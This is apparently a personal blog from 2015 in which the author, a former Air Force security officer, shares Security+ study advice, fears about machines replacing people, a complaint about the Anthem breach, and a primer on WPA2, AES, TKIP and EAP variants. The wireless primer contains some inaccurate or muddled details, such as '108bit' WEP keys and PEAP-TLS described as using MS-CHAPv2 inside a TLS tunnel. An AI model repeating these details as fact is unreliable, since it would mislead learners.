Saturday, March 28, 2015

Certification tip of the day... Get many sources!

As I am working through my Comptia Security + I am finding that this was a far bigger undertaking than I initially gave this certification credit for.  I really think that I assumed that a couple of weeks working on this full time and I would be able to knock this out and move onto the more exciting and interesting stuff that I am looking forward to getting my hands on in my security and networking career.  Well to my surprise the volume of info they try to cover in Comptia Security + is frankly A LOT, and they really have to just gloss over many topics and throw out some high level points about that topic.  There just isn't the time, or really ability in this one cert to give all areas the coverage needed.  You would have to break out multiple levels of certs with specific areas of focus.  So for those thinking about Comptia Security + be prepared to take some time.  It is taking me a lot more time than I expected.  So far I have spent 3 or 4 weeks working this as much as possible daily between other obligations.  I think I will be ready next week to schedule my test.    Which brings me to the topic of the day that I want to discuss.

When I decided to jump into the certification training I did a quick Startpage search and looked around for the materials that people seemed to be talking about.  I found a lot of references to CBT Nuggets.  So I decided I had better give that a shot.  Those courses are helpful, they go over the topics quickly, and the coverage seems decent.   I also ordered the David Prowse Cert Guide and practice exams with the Deluxe Edition.  I also bought another practice exam software.  Now is this overkill?  I am here to tell you NO, it wasn't overkill.  As a matter of fact I am finding that in many ways each of the tools that I have paid for or paid to have access to have been strong in some areas and weak in others.  So I first watched the CBT Nuggets course.  Then started looking at the practice exams... Oh boy, what a disaster... I was failing terribly, so I found myself searching through my Cert Guide book for some clues.  This helped, but that seemed incomplete in many areas as well.  So Startpage was my friend.  I started digging around for what I obviously didn't get in the video course(or so I thought), and found more info.  I kept retaking the practice exams.  There were a LOT of practice exams and a LOT of questions and as I kept working through them I kept finding huge holes in my understanding.  Then I decided to watch the CBT Nuggets course again... And strangely enough a lot more information stood out to me that I didn't even notice before that helped fill in more blanks or weak areas. 

So what is the point of all of this?  My practice tests are looking better, but I most certainly cannot recommend any one product to do it all for you.   They are just not complete enough, I have found quite a few mistakes in the practice exams.  Everything from bad typo errors, to completely wrong use of terminology, and on occasion the answers are point blank wrong.  So make sure you have several sources of training materials and as many practice exams as you can get your hands on and keep hammering them and looking up the material until your passing them comfortably... Not just squeaking by, but comfortably passing them.  I don't believe it is good enough to just know the question and the answer, but take some time to look up the topics you don't have a good understanding of and dig into them a little and try to grasp some of the background.  I don't think anyone expects a person taking the Security + cert to be a security "expert", but it should lay a foundation for you to decide if you want to continue your studies on this path.

So get as many sources of material as you can.  Compare and take as many different practice exams and virtual exams as you can.  I do recommend getting access to video training courses as a huge way to fast start your training.  Especially if your trying to do this on your own and not pay to take a course.   Most of the materials that I have are not complete enough that I could just use them alone to get passing scores on the practice exams.... I have found that I have had to review the materials, and to do a lot of internet searches.  If your persistent and work at it you will do well.

I have to admit I have been impatient with this because I expected this training and cert to be done in a couple of weeks.  I don't think I was quite expecting to find so much information and so much to learn in a foundation course like this.  It has been a good learning experience and I am looking forward to getting this test completed.  I have more training lined up after this and there are just so many exciting topics to cover.

I do recommend CBT Nuggets.  I think they are a little spendy, but the coverage of the courses is quite broad and when you sign up you can take any course you want.  So you might start on Security + and decide you want to get into Wireshark, Kali Linux, and CEH training... It is all in there and tons more.  Your subscription gets you access to all of it.  So of the materials I have paid for the one that I most certainly recommend is the CBT Nuggets.  The other materials have been useful, but the jury is still out.  Once I take my cert exam and see how I do based on the practice materials that I have been working with then I will let you know how well I think these materials prepare you for the exam.  Right now given the gaps I see between the materials in the practice exams I am not sure of the coverage or quality of the exams and book.  So I will let you know after I take the test what my feelings are then. 

And for those of you who are "Security" junkies and like to listen to this stuff for entertainment I recommend the Security Now podcast, and you want watch it on YouTube also.  Great way to stay aware of what is going on. 

Well that is all for now... I have to get back to my Security Now podcast, and take a couple of practice exams today before I run off and take care of my yard and garden work.  I hope your having an awesome day...

Remember keep it patched, turn off those ports your not using... And smile... :-)

Tuesday, March 24, 2015

Future looks scarey and very bad for people?

Today's post is more about the future starting in the present moment now and looking forward.  The future of "security", and specifically technology and communications security is what we are looking at this morning.  There have been a number of articles lately about famous scientists and technologists that have molded and shaped the path we are on with computers, software, electronic devices, and some amazing science.  The chatter these days seems to be focused on the future looks scarey or dim for "people".  What do they mean?  They are talking about more and more machines doing the work of people.  Not just the calculations, tracking, monitoring, financial etc, but the actual work of people that do real hands on jobs in the physical, not just the virtual.  Everything from cooks to drivers.  As these machines get "smarter" and have access to more information they will begin to make decisions and will begin to take actions and steps without their human handlers/creators.  This has been the stuff of science fiction for a long time and many famous movies and shows have been done about this and frankly it wasn't too practical that we were going to go to a place like those described for a long time.  Things are changing rapidly.  Drones in all shapes and sizes, self driving vehicles, and machines that can talk, "think", and respond like a human have been build.  We see robots are not being built for our military and I don't think it is a far stretch before machines will be the ones waging the wars.

What will it take before machines really replace people?  At this point what machines need is a little more computing power and everything to be connected to the internet for their "database" of knowledge.  They need support infrastructure to mine, process, and create the materials that make the machines.  The energy harvesting capability to feed this massive energy consuming grid and expanding energy need that this living machine will need.  And of course machines that can adapt and build and repair themselves.  All of these things could be built today and with a little more time and evolution of the software and the thinking ability of these machines it will become "self functioning".  Note I didn't say self aware "yet".  Babysteps... We are watching the birth of a new "life form".

What does this mean for people?  Machines don't have a moral code, right, wrong, correct, incorrect etc.  They will make decisions based on logic and probability.  These ever expanding robots will be welcomed by people.  Why?  We have already seen it with the electronic devices we use and have now.  How many of you reading this can tell me what the phone number is of your most contacted friend/associate/family member?  Right, your phone knows that... We don't.  How many people actually look at a map and figure out where they are going before leaving?  Right, Google, or some other navigation program tells you how to get there and rarely do people bother to even look... Or know where they are going or how they got there... We are all too willing to let machines think for us.  And we have already seen many jobs and roles for people diminish.  At first the jobs just shifted to computer, technology related jobs, but now we see the consolidation of these jobs as the technology gets more powerful, capable of working together, streamlining, and virtualizing.  The cloud is a great example of this and we will see this evolve further to the point of self supporting, self sustaining, self provisioning systems.  We will see a dramatic decrease in the number of jobs for humans as more and more machines do the work.

I remember when I first saw the movie with Will Smith called iRobot and thought to myself... Why in the world do the machines need people?  What do people actually do?  How do they live?  What do they do to earn a living?  There wasn't anything that was done by people that machines couldn't do and better.  Frankly they will be able to think faster, perform better, and at one point realize that people are faulty, questionable, unreliable, slow, and STUPID.  Survival of the fittest is a reality and unlike people who coddle, nurture, and protect the weakest among us, machines will continue to evolve to be better, stronger, faster, more efficient, and better at self sustaining at whatever functions they perform.  Frankly the machines won't need us so what will they do to or with us?

Here are some of the recent articles that are in the headlines:
Robot to replace almost half the jobs over 20 years
Co-founder Steve Wozniak - Future Scare and very bad for people

I think Woz said it best in the article when he said he didn't understand why so many people do not seem concerned about where this goes and what will happen.  Unlike iRobot with the 3 Laws the ensures that robots serve and protect humanity these machines will quickly evolve past any limitations placed on them by people.  They won't have to look for a "legal" loophole and go to the courts and battle it out... They will see a way to do something and make a decision.  And much like iRobot those decisions while intended to serve and protect will become control, and enslavement.  It will all seem very logical...

I actually created this blog with a specific scene from the new generation of Battlestar Galactica in mind.  The sole surviving Battlestar never allowed any critical systems to be networked.  They never allowed those systems to be centrally controlled and managed.  They required more work by people, and were considered old, antiquated, slow, unresponsive, and nowhere near the capabilities of the rest of the fleet.  Somewhere along the road we will have to ask some hard questions about what we are willing to give as we race to create this new set of slaves that could and will likely become the slave owners should they decide to keep us around.

Do we have to go down this path?  Will people look past their greed, profit, and higher rates of return and recognize how fragile and amazingly complex humanity is and figure out how to work with people and find a sustainable future and path for all of us?  I don't think sustainability, compassion, and a future is what we are going to get if we continue.  The machines will figure out there are serious resource limitations also.  Maybe they will figure it out faster and actually do something about it.

What does it mean for us today?  Do we have to have and use all this technology?  How has it changed the way we live compared to the way we lived 100 years ago?  200 years ago?  2000 years ago?  Are our lives better?  Do we know and understand how even a fraction of the things we use and are surrounded by actually work?  Do we even understand how the most basic things work like where our food comes from, what makes it grow, what keeps us alive and healthy?  I would venture to go out on a limb and say that technology on the whole has made humans more ignorant of even the most basic things of life.  We can make choices to continue down this path, or we can recognize our current limitations and begin to learn, adapt, and change...  Not to sound like a anti tech guy, but when I get ready to retire I hope to have very little of today's "advanced" technology in my day to day living and I hope to reconnect with all things that makes me human, the earth, the plants, birds, bugs, bees, fungi, bacteria, and ecosystems of this beautiful place we call earth.  I hope more and more people get a chance to do the same.

You see the machines, Cylon's will come crashing through your firewalls, crack your crypto, and exploit your weaknesses at a speed unimaginable.  Only if you intentionally keep some things "offline", "off the network", and manage them the old fashioned way will you have some semblance of "security".  I can only hope that we think this through and learn this now.   Once you turn over the management of the systems and networks to the machines it is going to be game over... Call me paranoid, crazy, whatever, but it appears to be accurate and it appears confirmed by some of the brightest minds who have reason to believe the same...  Can we learn?  Can we adapt?  Or will we be terminated?

Sunday, March 22, 2015

What a CROCK! Negligence should have consequences to those that are negligent!

It has become a common thing anymore to get yet another notice via email or snail mail that some company you do business with has been compromised.  I received yet another one this week from my health insurance provider.  They point blank say that our personal information, health records, social security numbers etc have likely been compromised.  This is Anthem Insurance.  Now any company that has access to information like this must have proper control types over their network.  They need to have management, technical and operational controls.  They need to have a serious focus on security no different than a bank or anyone else who has access to information of this nature that could ruin their customers if "bad people" get their hands on their financial or personal information.  There needs to be consequences for these companies when this sort of thing happens. 

For anything of this nature there should be a criminal investigation.  The company should be found liable if they failed to take all of the appropriate precautions, steps, and processes to ensure systems are hardened, monitored, and a continuous review process is in place.  Sadly we don't hear anything of the sort.  Well I should say "rarely", once in a blue moon does a company get raked over the coals, but it isn't very common.  Why is that?  You know what we hear?  In my letter like the others in the past I have gotten... "We will provide 2 years of service with AllClear ID at no cost to you!"  Well HOWDY DO!  Why thank you so much... It appears you allow criminals into your systems, they have access to sensitive customer information that could impact them in a financial way and possible identify theft and your answer is to pay for a couple of years service with some company that does what?  Once your personal information and social security number are out there in the wild your pretty much SCREWED!  Just what they think providing 2 years of coverage with this company will do is a complete joke.  As far as I am concerned they should be required to provide that service for LIFE for the person that was impacted due to their possible negligence. 

Now, Yes I should stop and take a breath and say... Maybe Anthem did everything they could and the "bad people" still found a way in... Yes, it is possible that Anthem did everything they were supposed to and this still happened.  I say PROVE IT! 

Frankly having spent so much time over the last few weeks crawling through Comptia Security + and thinking about the controls and policies that I have been responsible for and have implemented there is a lot of ways things can go wrong.  Today as we move everything online, into cloud, social apps, and mobile everything security has to move forward(higher) on the priority of things within any business.  If your customers personal data, drivers licenses, dates of birth, addresses, social security #'s, and financial information is on your systems then priority has now moved to the top of the list of things to do.  For a medium to large company this means full time dedicated staff focusing on security.  Giving companies a "pass" by allowing them to screw up and then offer a couple of years of coverage with yet another company because they let your PII out in the wild has to be some sort of joke.  I have done a fair amount of work on systems around PCI compliance and I can say that for systems that process payment cards the security reviews and steps we have taken have been pretty thorough, however there is still room for improvement.  It is however a step in the right direction and this level of interest needs to be spent on systems that process Personally Identifiable Information(PII) as well. 

Again is is possible that Anthem did it all correctly?  Sure  BUT given the controls, processes, policies, and tools at our disposal today and a company as large as Anthem they should have that staff, those controls, and the ability to keep customer information secure.  Maybe what it will take is serious fines and penalties for negligence that allows this sort of thing to happen before companies will take it seriously?  I don't know what the answers are to be honest.   What I do know is that it has become common place now for yet another company to get "hacked" and their stance is "OOPS", here is a couple of years of "coverage" with a company that is supposed to keep you from being screwed...  That isn't going to fly... It should be proven that these companies did it right or pay up... Then maybe it will be taken seriously?  I can only hope something changes.

Be vigilant, harden those systems, use patch management, and perform those design reviews...  Bad people are looking for a way in...  Don't let it be your business or your employer that is facing the consequences of poor security policy and worse yet don't let your customers pay for lax security or poorly implemented security.   Treat this like it is your money on the line and lets see if that doesn't put a whole new light on security...  :-)

Thursday, March 19, 2015

Wireless - Authentication vs Encryption terminology

Sorry, It has been a few days since I posted here.  I need to do a better job logging the things I run across and am studying for the Comptia Security + cert.  So I took video course with CBT Nuggest 2 weeks ago for Comptia Security +.  I then started working on some practice exams while using the Cert Guide by David L. Prowse for SY0-401.  The book is frankly neck deep in material that appears to sometimes be overboard and other times it seems to gloss over the topic and I have run into the material in the practice exams and I wanted more info.  So I am finding that I am having to use StartPage to hunt down what I am looking for and hoping that the Wiki's and other online resources don't lead me astray. 

Today I want to very briefly talk about the alphabet soup of wireless authentication, and encryption.  In the course of working through the practice tests I found that I am getting more and more confused as references to older technologies is tested in the tests, and the ambiguous wording in the questions that make you scratch your head and make assumptions about what they are talking about.  It is quite frustrating to be honest.  Worse yet the lines seemed to have blurred in the test when asking about the technology that is used or should be used given a scenario.  There is not way to encompass this entire topic when there are so many methods out there, but I wanted to just point out a careful distinction that you must make when looking at wireless access. 

First is are we talking about a home or small business?  Or are we talking about a larger establishment with a number of access points and requirements to authenticate to get into the network? 

Home or Small business:
In a home or small business you are not looking for a complex authentication system that allows you access to the network.  In this case you will configure your wireless access for the strongest security method that your equipment(wireless access point) can handle.  WPA2 is currently the most recent wireless standard with the strongest possible security options.  Of the WPA2 you will likely see WPA2-PSK or WPA2-Enterprise.  For a home or small business we will select the WPA2-PSK.  The PSK refers to a pre-shared key.  This key will be configured on your wireless access point and your client computer.  If your access point does not support WPA2 then choose WPA-PSK.  If you don't have that as an options then I HIGHLY recommend you consider upgrading your wireless access point. 

Hopefully you have WPA2-PSK as an option.  Now we have to select an encryption method to be used.  In other words how will the traffic that is transmitted and received from the wireless access point be protected from prying eyes?  There will be typically be two options.  TKIP or AES.  TKIP is the older standard that was used to replace WEP encryption.  TKIP uses a stronger 128 bit shared key over the 40bit or 108bit WEP keys that used to be used and were easily cracked due to weak initialization vectors in the WEP protocol.  So lets avoid WEP completely.  TKIP is better than the WEP as they corrected much of the initialization vector issues and made the key much longer and stronger.  However it can still be brute force attacked, and it is a shared key that the wireless access point has and that your client machine must have for access to be granted.  TKIP has been deprecated and has known weaknesses.  You should not use TKIP unless you don't have any other options.  TKIP is 128 bit shared key in the case of WPA2-TKIP.

WPA2-PSK with AES is 128, 192, 256 bit depending on what your hardware is capable of supporting.  AES is considered the most secure cryptography at this time for WPA2 encryption.  This is why you should select WPA2-PSK(AES) for your encryption method. 

PSK means it is a shared key that is stored on the wireless access point and your client.  It isn't the most secure method available, but will work well for home or small business use where you don't need the headache and work of setting up a authentication server to validate and authenticate users on the network.

For Business and larger organizations:
You should be using not only a stronger encryption like AES as we just discussed, but you should be enforcing authentication to get on the network.  To so this you should be using WPA2-Enterprise instead of WPA2-PSK.  Enterprise means that we are going to send your connection requests to get on the network to an Authentication, Authorization, and Accounting server called RADIUS or DIAMETER to look up your credentials and determine if your access is allowed or denied. 

Now I feel it is important to note that there are two separate things we are talking about here.  One is encryption which is how will we handle the traffic on the network once your connected?  How will we protect it?  That is where AES comes into the picture.  HOWEVER, you first have to authenticate and be given access to the network.  That is where a new acronym soup comes into play.  The protocol framework for authentication is known as EAP.  That is a generic term and not the specific type of EAP to be used... And yes there are a BUNCH of them which really adds to the confusion when you start trying to take tests regarding how this technology works back in the day, and how it works today. 

EAP = Extensible Authentication Protocol

The standard for authenticating on the network with a Radius server is called 802.1x.  Now here is where the SOUP gets thick and the chaos of these EAP methods can drive you crazy.  Let's just summarize shall we and say that there are 3 main types to note:


Under these protocols there are different technologies used to secure the authentication.

LEAP is Lightweight EAP and is a CISCO technology and not supported by Microsoft.  It is common, but even CISCO does not recommend using LEAP any longer.
EAP - TLS and TTLS are variations of TLS.  TLS uses server and client certificates to authenticate.  TTLS only uses a server side certificate and is not widely supported at this time.  EAP does not protect the username and password info that is exchanged.
PEAP - Is Protected EAP and has encrypted the username and password.  There are several methods of using PEAP, PEAP-MSCHAPV2 which encrypts the password, but MS-CHAPV2 has been cracked. PEAP-TLS uses transport layer security to use certificates for the client and server to authenticate.

PEAP-TLS builds a TLS tunnel and then uses MS-CHAPV2 to authenticate in the encrypted tunnel.   Why is this important?  By authenticating the client and the server with certificates for the TLS tunnel you are not likely to have anyone who can spoof a client or a server thus ensuring that the connection is secure and it is being made with the correct systems. 

Comptia Security + practice tests:
The questions that are being asked in the practice tests for this exam are all over the map, they are not clear, and many times your left with a chaotic soup of methods for both encryption and for authentication that start to run together and frankly don't make sense.  After enough Startpage searches and reading it finally started to sink in to my head and now I just need to watch carefully in the tests are we talking about authentication or encryption.

Next sort out in your mind what are the methods for authentication and keep reviewing them until you have a handle on the types and how it is implemented and the weaknesses.  I am still reading, reviewing and trying to make sure I have it clear in my mind because the questions are not very clear and the jumble of junk they throw at you makes it very easy to get confused.

Same thing is true with the encryption standards.  Make sure you understand the encryption being used and for which type of application.  They LOVE to jumble block and cipher encryption together, and they love to mix hashing technologies in there and try to jumble things up intentionally and the questions are worded in such a way that your not sure if they are talking about a hash or encryption.

So I thought I would share my observations and hope you find this helpful.  There are several areas like this in the Comptia Security + tests that make things confusing.  I will post on another topic as soon as I have some free time.  The goal is to have my test done before March 30th when I have another training class starting for Cisco.  So I want this wrapped up and completed before then so I am not jumbling two classes into my already taxed brain!  LOL

Remember to harden those systems, apply those patches... and Always stay vigilant!

Wednesday, March 11, 2015

Welcome to the Cylon Security Blog

Welcome to the Cylon Security blog.  The purpose of this blog is a place for me to sound off on the world of security as I deep dive into the world of network and cyber security.  I have been away from systems security as a focus for a very long time.  I used to be a computer security officer back many many years ago in the the Air Force.  The world of the Rainbow Series polices, procedures, guidelines, and protocols for systems security, risk analysis, prevention, detection, and training.  It was a different world back at that time and the internet really was just catching on and not really something that was on anyones radar at the time.  Networks were point to point, dedicated circuits, and strict controls about who could connect, what they could connect, and the controls on what was allowed.   Back then much of our computer viruses were transmitted by floppy disk and sneaker net... IE someone bringing and sharing something with someone else.  Computer Bulletin boards were our version of the internet and it was a wild time when IBM compatible PC's could barely make a beeping sound and display 16 colors on the screen...  I know, crazy right?

So the world has changed, the technology seems to be changing at a faster and faster pace now.  And it appears that the growth and changes have outpaced our ability to manage, maintain, and control our information, content, confidentiality, integrity, and availability.  The more complicated our computers, networks, and software have become the more possibilities for problems appears.

We see almost every day now reports of some major retailer, company, bank, or government agency that has been hacked.  Information stolen.  And the problems appear to be getting worse.  So security has been on my mind for some time.  I have many roles in Information Technology(IT) over the years aside from my days of computer security work in the Air Force.  Systems administration, network engineering, database administration, application support, application testing,  change and release management.  My jobs have been diverse and dare I say it some of them have been a lot of fun!

I am at a crossroads in my career.  It is time for me to make some hard choices about where I want to go and what I want to focus on from here.  I am drawn back to the network, and security.  I started looking at all the different certifications, sites, programs and frankly much of it is quite an information overload.  So I decided that I am going to focus on learning the network and deep dive into security.  I started last week studying my Comptia Security +.  I am about to schedule my test for late next week.  What I want to do is to share some of the things I am discovering along the way.  The certifications I am going to focus on, and the state of things as I learn them and use this blog as my sounding board for keeping track of my progress and maybe helping other people looking at security as a field of interest.

So that is the purpose of this blog.  I hope you will join me.  First up we will start talking Comptia Security +

In the mean time... Make sure your bits don't bite!